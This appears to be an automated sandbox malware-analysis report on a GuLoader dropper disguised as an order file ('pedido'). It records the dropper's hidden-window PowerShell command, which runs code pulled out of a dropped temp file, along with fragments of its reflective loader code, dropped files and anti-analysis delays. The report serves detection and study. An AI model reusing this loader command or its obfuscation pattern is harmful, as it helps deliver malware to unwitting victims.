            Source: pedido-035241.exeStatic file information: File size 1093536 > 1048576
            Source: pedido-035241.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            barindex
            Yara detected GuLoader
            Source: Yara matchFile source: 00000006.00000002.2962912276.0000000004C2B000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Found suspicious powershell code related to unpacking or dynamic code loading
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Fenghwang $tendon $Broggle), (Safiansbindenes @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Gumpetungt = [AppDomain]::CurrentDomain.GetAssemblies()$globa
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Blthavs)), $Tryklaasene).DefineDynamicModule($Alkoholtype, $false).DefineType($Coleopterist, $fodfolksregimenter, [System.MulticastDel
            Suspicious powershell command line found
            Source: C:\Users\user\Desktop\pedido-035241.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Veges95=gc -raw 'C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\takelma.Uns';$Makulaturs=$Veges95.SubString(71268,3);.$Makulaturs($Veges95) "
            Source: C:\Users\user\Desktop\pedido-035241.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Veges95=gc -raw 'C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\takelma.Uns';$Makulaturs=$Veges95.SubString(71268,3);.$Makulaturs($Veges95) "Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_02BE891E pushad ; iretd 6_2_02BE891F
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_02BE8C2F pushfd ; iretd 6_2_02BE8C30
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_02BE8DDF push esp; iretd 6_2_02BE8DE0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_04067104 pushad ; iretd 6_2_0406710B
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_04064F92 push eax; retf 6_2_04064F93
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_04066828 push edx; ret 6_2_04066837
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_040629D1 push esi; retf 6_2_040629D6
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\Flyvevaabnene\pedido-035241.exeJump to dropped file
            Source: C:\Users\user\Desktop\pedido-035241.exeFile created: C:\Users\user\AppData\Local\Temp\nso7E83.tmp\nsExec.dllJump to dropped file
            Source: C:\Users\user\Desktop\pedido-035241.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semitelic.iniJump to behavior

            Hooking and other Techniques for Hiding and Protection

            barindex
            Loading BitLocker PowerShell Module
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Users\user\Desktop\pedido-035241.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599890Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599781Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599671Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599562Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599452Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599343Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599234Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599125Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599015Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598906Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598796Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598687Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598578Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598468Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598359Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598250Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598140Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598031Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597921Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597812Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597702Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597593Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597484Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597375Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597265Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597156Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597046Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596937Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596827Jump to behavior
